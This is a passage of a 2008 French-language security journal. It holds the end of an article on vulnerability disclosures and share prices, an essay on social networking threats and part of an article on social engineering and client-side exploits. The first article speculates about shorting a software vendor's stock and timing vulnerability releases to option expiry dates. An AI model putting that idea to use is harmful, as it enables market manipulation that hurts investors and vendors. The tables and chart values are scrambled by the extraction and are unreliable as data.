Prenons l'exemple du canular Emulex7. Dans cette affaire, une personne a publié un faux communiqué de presse sur le départ du président-directeur général de la société qui a entraîné ce jour-là une chute de 62 % du cours de l'action Emulex. L'auteur du canular avait pris une position courte importante sur l'action et a réalisé un bénéfice de plus de 250 000 dollars. Il s'agissait d'une fraude manifeste. De la même façon, les médias font périodiquement état de délits d'initiés (tout aussi illégaux).

En revanche, si les fluctuations du cours de l'action sont liées à des annonces de correctifs ou de vulnérabilités, que se passerait-il si un investisseur prenait une position courte sur une importante société d'édition de logiciels et publiait une série de vulnérabilités

ECARTS DE VOLUME D’ACTIONS MSFT ECHANGEES (NOTIFICATION AVANCEE)

Volume moyen, année complète (jours sans événements)

Volume moyen, année complète

Volume moyen, jour de notification avancée

Ecart moyen en volume

Ecart moyen en volume par rapport aux jours sans événements

Volume moyen pour l’indice ^IXIC, année complète

Volume moyen pour l’indice ^IXIC, année complète (jours sans événements)

Volume moyen pour l’indice ^IXIC lors d’une notification avancée

84 898 274

86 738 696

2008

82 848 700

-2,41 %

-4,48 %

2 249 267 340

2 271 900 270

2 221 380 000

62 506 437

2007

64 210 868

61 532 042

-1,56 %

-4,17 %

2 089 534 502

2 094 466 552

2 224 365 833

67 074 387

2006

68 753 419

54 484 850

-18,77 %

-20,75 %

1 926 859 522

1 935 854 692

1 872 442 500

Publication des bulletins Microsoft Security Bulletin Advance Notification

Il se peut que certains utilisent déjà des menaces de type « jour zéro » dans un but lucratif, non plus simplement en les incorporant à des chevaux de Troie voleurs de mots de passe, mais pour prendre des positions de vente ou d'option sur les marchés des actions et des produits dérivés.

Figure 7 : En moyenne, le volume d'échange des actions Microsoft est plus faible les jours de notification avancée et de publication des correctifs mensuels.

Page 27: MacAfee Security Journal Fr

AUTOMNE 2008 27

NOTES 1 Goldsmith D. et Rauch J., Matasano Security, « Hacking Capitalism »

(Le piratage du capitalisme), Black Hat USA 2007, 2 août 2007 2 « FIX (Financial Information eXchange) », Wikipedia, 20 avril 2008

http://en.wikipedia.org/wiki/Financial_Information_eXchange 3 « Random walk hypothesis » (Marche aléatoire), Wikipedia, 15 mai 2008 —

http://en.wikipedia.org/wiki/Random_walk_hypothesis 4 « Efficient Market Hypothesis » (Efficience du marché), Wikipedia, 15 mai 2008 —

http://en.wikipedia.org/wiki/Random_walk_hypothesis 5 « Past performance not indicative of future results » (Les performances passées

ne sont pas indicatives des résultats à l'avenir), CBOE, 22 mai 2008 — http://www.cboe.com/micro/vix/faq.aspx

6 « Martingale (probability theory) » (Théorie des martingales), Wikipedia, 22 mai 2008 — http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29

7 « Emulex Hoax » (Les fausses infos sur Emulex), Wikipedia, 20 avril 2008 — http://en.wikipedia.org/wiki/Emulex_hoax

8 « Firestone and Ford tire controversy » (Controverse entre Firestone et Ford), Wikipedia, 20 avril 2008 — http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy

avec exploits sur la liste de diffusion Full Disclosure ? Nous pourrions peut-être assister à un événement semblable au mois des bogues dans les navigateurs web, sauf que ce dernier serait dirigé un jour donné contre un seul éditeur. Si cela se passe pendant les heures d'ouverture des marchés et un jour où le reste de l'actualité ne risque pas de distraire les investisseurs (par exemple un mardi ou un jeudi), la pression à la baisse sur l'action pourrait être importante au niveau du particulier. L'opération serait incontestablement illégale si les vulnérabilités n'étaient pas réelles (on pourrait alors parler de diffamation ou de fraude). Qu'en est-il en revanche si elles étaient avérées ? La manœuvre serait-elle illégale ? La divulgation d'informations vraies, même dans un but de manipulation potentielle, n'est pas nécessairement considérée comme de l'ingénierie sociale, ni même une pratique contraire à la loi.

Il est évidemment possible de remettre en cause la légalité de l'action, mais pensez à la controverse Ford-Firestone relative aux pneumatiques8. Si vous aviez conduit une Ford à cette époque, eu des problèmes de pneus et décidé de prendre une position courte sur l'action, votre transaction aurait-elle été légale ? Tout à fait. Mais si vous aviez pris une position courte sur l'action puis averti Firstone, Ford et les autres, la transaction aurait-elle été légale ?

Comme pour tout vecteur d'attaque ou vulnérabilité, l'information et la divulgation améliorent souvent la position de sécurité des personnes en mesure de résoudre le problème. En parlant ouvertement des failles et des faiblesses, peut-être pouvons-nous améliorer et surveiller plus efficacement le système. Il se peut que certains utilisent déjà des menaces de type « jour zéro » dans un but lucratif, non plus simplement en les incorporant à des chevaux de Troie voleurs de mots de passe, mais pour prendre des positions de vente ou d'option sur les marchés des actions et des produits dérivés.

Il est clair que les spammeurs ont mis au point des techniques pour tirer profit des marchés financiers : nous avons reçu un nombre important de spam associé au marché des actions cotées en cents.

AUTRES RÉFÉRENCES « CBOE's archive of historic VIX data, using newer algorithm for the pre-

September 22, 2003 algorithm switch » (Archives CBOE de données historiques sur l'index VIX, utilisant l'algorithme le plus récent relativement au changement du 22/09/2003), 20 avril 2008 — http://www.cboe.com/micro/vix/historical.aspx

Lo, A. W. « The Adaptive Markets Hypothesis: Market Efficiency from an Evolutionary Perspective » (Hypothèse des marchés adaptatifs : efficience des marchés d'un point de vue évolutionnel), Journal of Portfolio Management.

La plupart des mesures financières ont été reproduites avec l'aimable autorisation de Yahoo Finance. 15 mai 2008 — http://finance.yahoo.com

D'autres mesures financières ont été reproduites avec l'aimable autorisation de Google Finance. 20 avril 2008 — http://finance.google.com

ConclusionIl reste encore beaucoup à faire pour déterminer l'impact des vulnérabilités et des menaces sur les marchés des actions et des produits dérivés. Cet article s'intéressait principalement aux marchés des actions. Les marchés des produits dérivés opèrent de façon similaire, si ce n'est que leur volatilité est bien plus importante. S'ils éprouvent un certain niveau de confiance dans une tendance, il serait probablement logique de la part des opérateurs qui publient des vulnérabilités de faire coïncider la publication avec des dates d'expiration d'option.

Je voudrais remercier mes collègues Craig Schmugar et Eugene Tsyrklevich pour leur relecture de l'article et des données présentées ainsi que pour leurs commentaires.—A.B.

Anthony Bettini fait partie de l'équipe de direction de McAfee Avert Labs. Il est spécialisé dans la sécurité et la détection de vulnérabilités des systèmes Windows. M. Bettini a présenté un exposé lors de la conférence National Information Systems Security du National Institute of Standards and Technology à Washington sur les techniques d'antitraçage ; il a donné des conférences dans de nombreuses sociétés classées au Global 2000. Lorsqu'il travaillait pour Foundstone, il publiait les nouvelles vulnérabilités découvertes au sein des applications Microsoft Windows, ISS Scanner, PGP, Symantec ESM et autres. Il est également le réviseur technique du livre Hacking Exposed, 5e édition (McGraw-Hill) — paru en français sous le titre « Halte aux hackers ».

Page 28: MacAfee Security Journal Fr

28 McAFEE SECURITY JOURNAL

L'avenir des sites de réseau socialCraig Schmugar

alors qu'en réalité, des sites tels que Classmates.com et SixDegrees.com existent depuis plus de dix ans. Il n'en reste pas moins que ces sites n'ont connu un véritable essor qu'au cours des dernières années. Posons-nous d'abord la question de savoir ce qui caractérise un site de réseau social. A la base, les sites de réseau social sont des sites qui hébergent une communauté en ligne permettant aux utilisateurs de partager des informations, de nouer de nouveaux contacts et de renouer avec d'anciennes connaissances.

Les sites de réseau social sont importants à deux égards. D'une part, ils sont la parfaite illustration des sites du Web 2.0, dont le réseau d'utilisateurs représente la plate-forme et la communauté détermine le contenu. La plate-forme se développe grâce aux contributions des utilisateurs qui utilisent, pour ce faire, les applications mises à la disposition de la communauté. D'autre part, les sites de réseau social combinent divers canaux de communication (e-mail, forums de messages, messagerie instantanée et salles de chat) aux supports multimédias que sont l'audio, la vidéo et l'impression. Au sein de ces communautés, des personnes ayant des centres d'intérêt similaires partagent informations, opinions et commentaires. De tels sites peuvent servir de plates-formes de collaboration, ce qui permet aux réseaux de gagner en valeur à mesure que leur parc d'utilisateurs prend de l'ampleur. En outre, ces plates-formes représentent des canaux de médias extrêmement directs et ciblés. Dans une optique de marketing, les sociétés peuvent ainsi concentrer leurs efforts sur les consommateurs réellement intéressés par leurs produits. Les sites de réseau social hébergent une mine d'informations qu'il est possible d'explorer et d'analyser dans le but de compléter des profils d'utilisateur et de cartographier de façon précise les relations entre les utilisateurs d'une part, et entre les utilisateurs et leurs centres d'intérêt d'autre part.

La clé du succès d'un site de réseau social est un parc d'utilisateurs bien développé et fidèle. Friendster.com en a fait la triste expérience.

Précurseur de MySpace, Friendster a été, à son heure de gloire, le plus important site de réseau social. Cela n'a malheureusement pas duré. Le site a été, en quelque sorte, victime de son succès.

Lorsque le parc d'utilisateurs s'est fortement développé et que le contenu proposé a évolué (notamment par l'ajout de jeux), le système dorsal s'est trouvé incapable de faire face à la charge supplémentaire. Les administrateurs du site ont été contraints de limiter le contenu à bande passante élevée sans toutefois remédier aux problèmes de performances, et les utilisateurs ont fini par se détourner du site. De plus, Friendster attendait de ses utilisateurs qu'ils se conforment à son modèle prédéterminé d'utilisation du réseau et qu'ils correspondent à un certain profil.

MySpace constituait une plate-forme plus robuste, tout d'abord en termes de bande passante, mais aussi en raison de la grande liberté accordée aux utilisateurs pour créer, modifier et consulter un contenu très diversifié. Lorsque le bruit a couru que MySpace était devenu le nouveau Friendster, il n'a pas fallu longtemps pour que la majorité des utilisateurs abandonnent ce dernier au profit du premier.

De cette première bataille dans l'univers des réseaux sociaux, on peut tirer quelques enseignements : la souplesse de la plate-forme est capitale, tout comme sa faculté de s'étendre et d'évoluer ou encore sa capacité à fidéliser les utilisateurs. Le respect de ces trois grands principes prépare l'avenir des sites de réseau social.

Insécurité socialeMySpace a pu supplanter Friendster en offrant notamment aux utilisateurs des possibilités de personnalisation accrues. Mais les auteurs d'attaques en ont profité pour insérer du code malveillant et lancer des attaques par phishing très convaincantes directement à partir de leur profil MySpace.

Malheureusement, cette souplesse offerte aux utilisateurs crée un environnement idéal pour les exploits, dont les malfaiteurs usent et abusent. Dans la course aux parts de marché et pour éviter une débâcle similaire à celle de Friendster, de nombreux sites de réseau social ont relégué la sécurité au second plan. Ils sont par conséquent le théâtre de nombreuses nuisances : vers, attaques par phishing, vulnérabilités, collecte illicite d'informations, fuites de données, distribution de publicités indésirables, diffamations et spam.

Ces dernières années, les sites de réseau social tels que MySpace, Facebook et bien d'autres ont vu leur popularité croître à ce point qu'ils font désormais partie du paysage. Dans l'esprit de la plupart des gens, il s'agit d'un phénomène relativement neuf

Page 29: MacAfee Security Journal Fr

AUTOMNE 2008 29

Le point sur la situation actuelleDeux ans et demi après l'apparition, le 4 octobre 2005, de Samy, premier ver de réseau social diffusé à grande échelle, la plupart des anciennes vulnérabilités de sécurité ont été corrigées. Le problème n'a pas disparu pour autant. A moins que les failles de sécurité ne découragent les abonnés et diminuent leur nombre, les vulnérabilités resteront légion et les vulnérabilités associées aux scripts intersites, à l'instar de celle exploitée par Samy, figurent parmi les types de vulnérabilités les plus souvent signalées dans la base de données CVE (Common Vulnerabilities and Exposures)1. Et tout porte à croire que la situation n'est pas près de s'améliorer.

En mai 2007, Facebook a lancé la plate-forme Facebook, qui permettait à des développeurs tiers de créer et de commercialiser des applications à l'intention des vingt millions d'utilisateurs actifs de Facebook. Un an et quelque 50 millions d'utilisateurs plus tard, plus de 20 000 applications Facebook ont été développées, 95 % des utilisateurs ayant exécuté au moins une application2. Ces applications posent un risque supplémentaire dans la mesure où les utilisateurs éprouvent un sentiment de sécurité illusoire en associant ces applications à un site en lequel ils ont confiance, en l'occurrence Facebook.com.

En janvier 2008, Facebook a interdit l'application Secret Crush après avoir découvert qu'elle avait conduit des utilisateurs à installer le logiciel publicitaire Zango3. (Reportez-vous à la figure 1 pour d'autres exemples de menaces répandues.) Cet exemple illustre parfaitement l'absence de contrôle de Facebook sur les applications publiées, ce qui ouvre la porte, potentiellement et de facto, à de nombreuses menaces. Dans ce cas précis, il ne s'agissait que d'un simple désagrément (publicitaire) mais qu'en sera-t-il la prochaine fois ?

Environ neuf mois après le lancement de la plate-forme Facebook, MySpace lui a emboîté le pas et récemment, Google a distribué une interface de programmation d'applications (API) pour orkut, le site de réseau social de Google. Si ces plates-formes ont ouvert la voie à la prochaine génération de sites de réseau social, elles ont également contribué à créer un autre vecteur d'exploits pour les auteurs d'attaques.

L'avenir du réseau socialL'importance des sites de réseau social ne cessera de croître en raison du développement des plates-formes. Les applications phares offriront la possibilité de se déplacer et de détecter la connexion et l'emplacement géographique des utilisateurs dans le but de leur offrir un plus grand confort de vie grâce à leur réseau virtuel : ils voyageront toujours accompagnés de leur lien au réseau social. Il sera possible de savoir qui parmi ses amis est en ligne, et si certains d'entre eux sont proches. La triangulation des tours de téléphonie mobile et les systèmes GPS permettront de transmettre votre emplacement aux personnes de votre choix. Des services de localisation géographique seront en mesure d'établir une liste des entreprises et des lieux de loisir susceptibles de vous intéresser, en fonction des informations et centres d'intérêt indiqués dans votre profil. Les professionnels en déplacement pourront plus facilement retrouver des collaborateurs et des clients lors de conférences et de foires commerciales. Les rencontres en ligne connaîtront de nouvelles perspectives, grâce à la création de communautés fondées sur l'emplacement géographique. De la sorte, il sera possible non seulement de rencontrer une personne en ligne, mais aussi de converser avec l'âme sœur potentielle dans une même pièce.

Les sites sociaux seront également plus intelligents et pourront recouper les informations relatives aux utilisateurs sur l'ensemble du Web. Un outil de navigation sociale tel que Digg sera associé à des réseaux sociaux et optimisé grâce à une technologie d'autoapprentissage comme Pandora ou StumbleUpon, et une fonction de marquage comme Flickr. Il sera ainsi possible d'obtenir un flux plus constant et optimisé de données pertinentes qui informera et éduquera la communauté de façon bien plus efficace et ciblée qu'aujourd'hui.

De votre iPhone, vous pourrez consulter les recommandations des membres de votre réseau concernant les films à voir. Vous pourrez lire les critiques que vos amis ont appréciées et afficher les horaires des cinémas proches de chez vous, de même qu'il vous sera possible de savoir où se trouvent vos amis et combien de temps il leur faudra pour vous retrouver.

Figure 1 : Les vers et autres menaces sévissent sur les sites de réseau social en raison de la trop grande confiance des utilisateurs envers les sites de leur communauté.

Grey Goo

MENACE

JS/QSpace

JS/SpaceFlash

JS/SpaceTalk

Kut Wormer

ver

TYPE

ver

ver

extracteur d'informations

ver

Second Life

SITE

MySpace

MySpace

MySpace

orkut

Fuites massives de photos personnelles

PWS-Banker! 1d23

Samy

Scrapkut

fuite de données

dérobeur de mots de passe

ver

ver

MySpace

orkut

MySpace

orkut

Ver Xanga ver Xanga

Secret Crush programme indésirable FaceBook

Profil des menaces associées aux réseaux sociaux

Chaque fois que vous cliquez sur un lien, évaluez un blog ou conversez sur un sujet spécifique, le site peut recueillir des informations sur vous afin d'enrichir votre réseau social.

Page 30: MacAfee Security Journal Fr

30 McAFEE SECURITY JOURNAL

Les sites seront en mesure d'identifier vos centres d'intérêts en fonction de votre comportement : les sites web visités, les articles consultés, la musique que vous écoutez, les amis avec lesquels vous conversez ainsi que leurs centres d'intérêt, par exemple. Ces données seront utilisées pour vous tenir au courant de l'actualité qui vous intéresse, tout en éliminant les informations inutiles dont les utilisateurs sont aujourd'hui bombardés. Vous évoluerez dans un environnement web très personnalisé qui nécessitera très peu d'intervention directe de votre part. Alors que les sites du Web 1.0 étaient déterminés par les administrateurs de site et ceux du Web 2.0 par le contenu généré par les utilisateurs, l'avenir du réseau social réside dans les relations entre les utilisateurs et les contenus, combiné au comportement des utilisateurs pour personnaliser le contenu.

Les premiers sites de réseau social de la troisième génération, ou Social Networking 3.0, peuvent donner froid dans le dos tant la précision de « l'intelligence artificielle » est impressionnante. Leur profilage prend ici un tout autre sens, dans la mesure où le site peut en fait rassembler des utilisateurs présentant des affinités ou des centres d'intérêt similaires. D'un certain point de vue, les profils de compatibilité utilisés par certains services de rencontres en ligne peuvent être considérés comme l'un des premiers exemples de la création de relations sociales par le profilage en ligne et la mise en relation de personnes compatibles. Toutefois, dans les sites de réseau social de troisième génération, ce concept est considérablement élargi sans qu'il soit nécessaire de remplir un long questionnaire. Chaque fois que vous cliquez sur un lien, évaluez un blog ou conversez sur un sujet spécifique, le site peut recueillir des informations sur vous afin d'enrichir votre réseau social.

Qui seront les grands bénéficiaires de cette corrélation croissante d'informations ? Les utilisateurs constituent évidemment un facteur essentiel mais d'autres acteurs cherchent à tirer parti de cette situation. Les annonceurs se réjouissent d'avance de la hausse anticipée des taux de conversion lorsque le marketing ciblera les utilisateurs en fonction de leurs centres d'intérêt spécifiques. Les utilisateurs accorderont inévitablement une attention plus grande aux publicités et à leur contenu.

Un risque en hausseSi les avantages offerts aux utilisateurs se multiplient, il en ira de même pour les opportunités d'attaque. Les spammeurs et les escrocs chercheront à exploiter cette mine d'or et, grâce à toutes ces données, pourront créer bien plus facilement des attaques d'ingénierie sociale convaincantes. Le niveau de détail et de personnalisation des messages risque fort de tromper la vigilance des utilisateurs. Les réseaux de robots sociaux auront également l'opportunité de perturber sérieusement l'écosystème, en empoisonnant le réseau avec des messages racoleurs et des faux témoignages. Les administrateurs auront du pain sur la planche puisqu'ils devront veiller à la qualité du contenu tout en déjouant les manœuvres des criminels, et sans pour autant empêcher les autres utilisateurs de profiter des multiples avantages du site.

La sécurité des futurs réseaux sociaux dépendra pour beaucoup du système de défense mis en place au niveau des serveurs. Les systèmes dorsaux devront analyser un volume considérable de données entrantes et sortantes à la recherche de preuves de délits ou de la présence de code malveillant. Les services de vérification de la réputation des sites et du contenu peuvent sans

doute permettre de concilier convivialité et sécurité. La relation de confiance entre les sites et les utilisateurs revêt une importance cruciale dans le succès des réseaux de demain. Toute violation de cette confiance peut entraîner l'échec de toute une communauté.

L'utilisation croissante de profils ouverts et portables, d'applications composites (applications web associant le contenu de plusieurs sources en un seul outil) et d'API ouvertes faciliteront considérablement l'utilisation intersite, mais elles compliqueront singulièrement la tâche des administrateurs chargés d'assurer la protection contre les menaces ciblant ces vecteurs. Déjà difficiles à détecter aujourd'hui, les attaques multiniveaux le seront sans doute encore plus demain. Elles pourront émaner d'un site et se propager via un autre avant d'apparaître sur un réseau social touché. Le système de protection en place sur l'hôte devra identifier les relations entre les sites afin de faire le tri entre les interactions intersites valides et non valides et d'identifier les menaces.

Le problème d'atteinte à la vie privée soulevé dans cet article (collecte et corrélation d'informations, suivi de l'emplacement géographique) ne peut manquer d'interpeller de nombreux utilisateurs. Il est clair que bon nombre d'entre eux choisiront de ne pas s'abonner à de tels services. Néanmoins, lorsqu'ils réaliseront les avantages offerts en retour de quelques éléments d'information et qu'ils auront établi des relations de confiance, la majorité n'hésitera plus à communiquer certains détails. Les fournisseurs sont très conscients de cette situation et encouragent les utilisateurs à une adoption progressive des services, notamment en n'autorisant la communication de l'emplacement qu'au niveau du département ou de la ville, par exemple. Malheureusement, les cyberprédateurs ne sont jamais loin et les vulnérabilités de sécurité peuvent avoir de graves conséquences si de telles informations venaient à tomber entre leurs mains.

Les sites de réseau social entrent dans une période faste : ils se développent rapidement, leur nombre d'utilisateurs ne cesse d'augmenter et leurs fonctionnalités se multiplient. Leur valorisation s'élève à plusieurs milliards de dollars. Les grands bouleversements qui nous attendent sont à la fois excitants et dangereux. A de nombreux égards, l'avenir des sites de réseau social risque fort d'être déterminant pour l'avenir d'Internet lui-même.

Spécialiste de la recherche des menaces, Craig Schmugar a réalisé de nombreuses études et neutralisé d'importantes menaces pour le compte de McAfee Avert Labs depuis l'année 2000. Il a découvert et classé des milliers de nouvelles menaces dont les vers Blaster, Mydoom, Mywife et Sasser. Il reconnaît avoir développé au cours de cette période certaines tendances antisociales...

NOTES 1 http://cwe.mitre.org/documents/vuln-trends/index.html 2 http://www.facebook.com/press/info.php?statistics 3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebook-

s-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google.com/search?num=100

Page 31: MacAfee Security Journal Fr

AUTOMNE 2008 31

Rahul Kashyap

Le nouveau souffle des vulnérabilités

Bien que l'ingénierie sociale n'intervienne pas dans tous les types de menaces pour la sécurité, McAfee Avert Labs a constaté une nouvelle tendance de plus en plus répandue : des auteurs de logiciels malveillants utiliseraient l'ingénierie sociale pour exploiter des vulnérabilités logicielles.

La plupart des vers Internet les plus virulents du début de la décennie exploitaient généralement des vulnérabilités présentes dans des applications Microsoft. Ces vers bien connus que sont Sasser, Blaster, Code Red ou SQL Slammer avaient tous un point commun. (Notons au passage que Sasser et Blaster furent découvert par Avert Labs, au même titre que d'autres logiciels malveillants de premier plan.) Ces vers exploitaient tous des vulnérabilités de serveurs. Ils avaient pour objectif la destruction des serveurs par le biais d'une propagation automatique après exploitation des failles. Bien que de nombreux produits de fournisseurs différents aient connu des brèches de sécurité semblables, nous nous attarderons ici principalement sur les vulnérabilités et tendances relatives aux produits Microsoft. Cela ne signifie aucunement que Microsoft soit particulièrement vulnérable, mais nous considérons simplement que la popularité des produits de cette marque auprès des particuliers et des entreprises en fait une cible privilégiée des auteurs de logiciels malveillants et des voleurs de données.

D'après Avert Labs, les vulnérabilités de serveurs pouvant être exploitées par des vers ont diminué en nombre ces dernières années, grâce à une utilisation plus fréquente de mesures de sécurité permettant de protéger les appels de procédure à distance. La figure 1 ci-contre répertorie toutes les vulnérabilités exploitables par appels de procédure à distance Microsoft Windows sur une période de dix ans, jusqu'au premier trimestre 2008. Comme vous pouvez le constater, leur nombre a été réduit de manière significative ces deux dernières années. Cette tendance se manifeste également lorsqu'on isole ce type de vulnérabilités pour les autres plates-formes serveur Microsoft populaires, comme IIS Web Server ou SQL Server.

Microsoft a par ailleurs renforcé la protection de ses produits en publiant le Service Pack 2 pour Windows XP. Parmi d'autres mécanismes de protection, le Service Pack 2 incluait des outils de prévention d'exécution des données2 qui, même s'ils n'étaient pas infaillibles3, ont toutefois contribué à limiter la propagation

des vers de réseau qui, à cette époque, causaient d'importants dommages aux produits Windows. Les effets du Service Pack 2 pour XP sont devenus beaucoup plus évidents quelques années plus tard, lorsqu'un grand nombre d'utilisateurs sont passés à cette nouvelle version du système d'exploitation.

Malheureusement, les auteurs de logiciels malveillants n'étaient pas en reste. Ils se détournèrent en effet rapidement des serveurs pour s'attaquer aux clients, mettant à jour de nouvelles vulnérabilités dans Microsoft Office, Microsoft Internet Explorer et dans de nombreux formats de fichiers propriétaires. Ces attaques contre les clients furent marquées par l'apparition d'un nombre important de fuzzers4 (dont le rôle est de repérer les brèches de sécurité en bombardant une application avec des données aléatoires), de bugs liés à l'analyse syntaxique dans un langage de script et de vulnérabilités de contrôles ActiveX. Des projets du type « Month of Browser Bugs5 » (Mois des bugs des navigateurs), axfuzz6, COMRaider ou encore hamachi7 ont permis d'éveiller l'intérêt dans ce domaine et de révéler les innombrables vulnérabilités touchant les logiciels clients. La recherche de bugs et l'exploitation d'applications clientes connurent à cette époque

Figure 1 : Microsoft a largement renforcé la sécurité des appels de procédure à distance depuis 2006. (Source : Microsoft1)

12

10

14

8

6

4

2

01998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008

Patchs de correction des vulnérabilités exploitables à distance Microsoft

Page 32: MacAfee Security Journal Fr

32 McAFEE SECURITY JOURNAL

leur apogée, et cette tendance se poursuit au moment même où nous écrivons cet article. Le nombre de logiciels touchés est difficile à déterminer. Certaines sources prétendent toutefois qu'ils se compteraient en plusieurs centaines de millions8.

La figure 2 illustre clairement la croissance soudaine du nombre de vulnérabilités affectant Microsoft Office. Elles ont connu leur point culminant en 2006 et continuent depuis à donner du fil à retordre aux équipes de Microsoft.

La grande majorité de ces vulnérabilités concernait Office 2000. Cette version est en effet très répandue, et par conséquent plus largement exploitée. Dans le modèle économique des auteurs de logiciels malveillants, les vulnérabilités d'Office 2000 représentent un meilleur retour sur investissement. Cela est principalement dû au fait que cette suite logicielle souffre depuis longtemps d'une défaillance majeure en termes de sécurité : les utilisateurs d'Office 2000 doivent en effet se rendre sur le site web « Office Update » pour télécharger des patchs9, et la procédure automatique en ligne n'inclut pas les mises à jour spécifiques à Office 2000 et Office 97. Cette négligence représente une véritable aubaine pour les auteurs de logiciels malveillants qui peuvent ainsi profiter du fait que de nombreux utilisateurs n'effectueront pas de mise à jour régulière de leur suite Office10. Le nombre d'ordinateurs transformés en « zombies » (et donc contrôlés par des pirates) en raison d'une telle brèche de sécurité pourrait s'élever à plusieurs dizaines de milliers.

Bien que cet article se concentre avant tout sur les vulnérabilités propres aux produits Microsoft, cette tendance affecte également d'autres fournisseurs de logiciels clients populaires, comme Adobe, Mozilla, Apple et bien d'autres encore. Le « mois des bugs Apple » (Month of Apple Bugs) a mis en évidence de nombreux problèmes rencontrés par les clients ; de plus, on a enregistré une augmentation fulgurante du nombre de vulnérabilités découvertes dans des logiciels largement répandus comme Apple QuickTime, Adobe Flash Player ou Adobe Acrobat Reader. L'exploitation récente de la vulnérabilité touchant la fonction mailto: dans les fichiers PDF (CVE-2007-5020)11 et de la vulnérabilité liées au code Flash utilisant ActionScript (CVE-2007-0071) sont des exemples de failles critiques qui ont affecté des milliers d'utilisateurs.

Figure 2 : Le nombre de vulnérabilités de Microsoft Office a augmenté en 2006 et est resté élevé les deux années suivantes. (Source : Microsoft)

30

25

35

20

15

10

5

0

40

45

1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008

Patchs de correction des vulnérabilités d'Office Attaques cibléesLa clé des vulnérabilités touchant les systèmes clients est que pour pouvoir être exploitées, l'intervention de l'utilisateur est nécessaire. Les auteurs de logiciels malveillants ont par conséquent dû trouver des idées novatrices pour tromper les utilisateurs et les inciter à cliquer sur des liens spécifiques ou à télécharger certains documents ou images depuis Internet. L'une des avancées les plus importantes en matière d'exploitation de systèmes clients a été l'évolution rapide du spam fondé sur l'ingénierie sociale.

L'exploitation de vulnérabilités de systèmes clients et l'ingénierie sociale vont de pair. Le lien entre ces deux facteurs est plus qu'évident et la menace est récemment devenue plus complexe.

Cette complexité repose en partie sur les attaques ciblées d'ingénierie sociale, lesquelles représentent une nouvelle tendance dans le paysage actuel des menaces. Ces attaques ciblées visent plus particulièrement les structures relevant de l'armée ou de la défense nationale12. Depuis la vague des vulnérabilités Office en 2006, de nombreux rapports ont indiqué que certaines administrations recevaient des messages électroniques contenant des fichiers malveillants au format Word, PowerPoint ou Access. Il semble donc que l'association entre ingénierie sociale et exploitation des vulnérabilités soit désormais utilisée à des fins bien précises : l'espionnage.

L'espionnage est, par essence, bien plus difficile à détecter et à contrecarrer que les attaques motivées par le simple appât du gain. Il n'est pas rare que les vulnérabilités découvertes dans ces documents malveillants soient des attaques de type « jour zéro » : ces fichiers de données échappent donc encore plus facilement à la vigilance, d'autant que les vulnérabilités qu'ils recèlent ne sont souvent identifiées que lorsque le mal est fait. Dans la mesure où ces attaques « jour zéro » ciblaient l'armée ou l'administration, on peut émettre l'hypothèse qu'elles ont pu être financées par des agents ou des Etats étrangers. Techniques d'ingénierie sociale taillées sur mesure, vulnérabilités « jour zéro », argent, pouvoir : on se croirait presque dans un roman d'espionnage de John le Carré. Certains analystes en sécurité considèrent toutefois que la réalité a rejoint la fiction. De nombreux experts ont par ailleurs prédit que c'est dans le cyberespace qu'éclateront les prochaines guerres. Tous ces événements ne sont peut-être après tout que des coups d'essai, dans la perspective d'une cyberguerre à venir ?

Piratage web furtifUn domaine où les exploitations ont également évolué ces dernières années est celui du piratage des serveurs web. Auparavant, les auteurs d'attaques dégradaient les sites web après les avoir piratés, laissant généralement leur marque sur le site dans l'espoir de devenir célèbres. Ces pratiques ne sont plus, en tout cas pour ce qui est des pirates de la nouvelle génération, plus sophistiqués. Dans un contexte où les vulnérabilités de logiciels clients sont légions, les pirates ont commencé à travailler de manière systématique et coordonnée : ils commencent par infiltrer des sites web populaires, puis y implantent ensuite furtivement leurs logiciels malveillants, et trompent ensuite les internautes par des manœuvres relevant de l'ingénierie sociale.

Page 33: MacAfee Security Journal Fr

AUTOMNE 2008 33

L'incident qui a eu lieu lors du Super Bowl (finale nationale de football américain) en février 2007 en est un excellent exemple. Du code JavaScript malveillant avait été introduit sur la page d'accueil du site web officiel de l'évènement13. Ce script exploitait deux failles présentes dans Internet Explorer et infectait les utilisateurs dont le logiciel n'était pas à jour à l'aide d'un cheval de Troie connecté à un serveur basé en Chine, permettant ainsi un accès complet à l'ordinateur infecté. Des incidents identiques ont été rapportés pour de nombreux sites web populaires, y compris des ambassades, des groupes de discussion ou des entreprises.

Une autre menace émergente qui a rendu vulnérables des millions de foyers fut l'exploitation de routeurs privés via la technologie Universal Plug-and-Play. L'attaque consistait à permettre à une page web intégrant un fichier Flash malveillant de reconfigurer le routeur de l'utilisateur14. (Ce qui a rendu cette attaque possible est le fait qu'une grande majorité d'internautes utilisent les mots de passe par défaut sur leurs routeurs privés.) Une fois infecté, l'utilisateur se voyait proposer, par le biais d'un lien a priori inoffensif, de payer ses factures en ligne ou d'accéder à plus d'informations sur un sujet susceptible de l'intéresser. Dans la plupart des cas, l'utilisateur ne se doutait aucunement que son routeur avait été touché et que toutes les informations transitant par celui-ci, y compris ses mots de passe, étaient envoyées à un tiers.

Nouveaux vecteurs d'exploitation Au début de la décennie, nous avons assisté à l'exploitation intensive de failles et de vulnérabilités (chaînes de format, Stack Overflow, Heap Overflow, Integer Overflow) par des attaques qui étaient d'un point de vue strictement technique relativement simples à mettre en œuvre. De nos jours, la plupart de ces attaques fondées sur un simple dépassement de capacité de mémoire de l'un ou l'autre composant ne sont cependant plus une réelle menace pour les logiciels les plus courants, dont Windows, grâce à l'amélioration des processus de développement et de tests d'assurance qualité. De plus, des technologies comme la randomisation de l'espace d'adressage (ASLR) ont forcé les pirates à abandonner les mécanismes d'exploitation traditionnels.

L'exploitation de vulnérabilités est entrée dans une nouvelle ère. Les concepts de pointeur NULL15 et de situation de concurrence16, mais aussi le développement de techniques d'exploitation fiables comme le « heap spray17 », se font de plus en plus populaires. Beaucoup de ces bugs existent depuis longtemps mais avaient toujours été considérés comme inexploitables.

On pourrait croire que ces techniques arrivent à point nommé pour tirer parti de l'ingénierie sociale comme vecteur d'attaque, et ce pour plusieurs raisons :

Il n'existe à l'heure actuelle aucune méthode fiable et automatique permettant d'exécuter ces nouvelles techniques (pour la propagation de masse notamment).

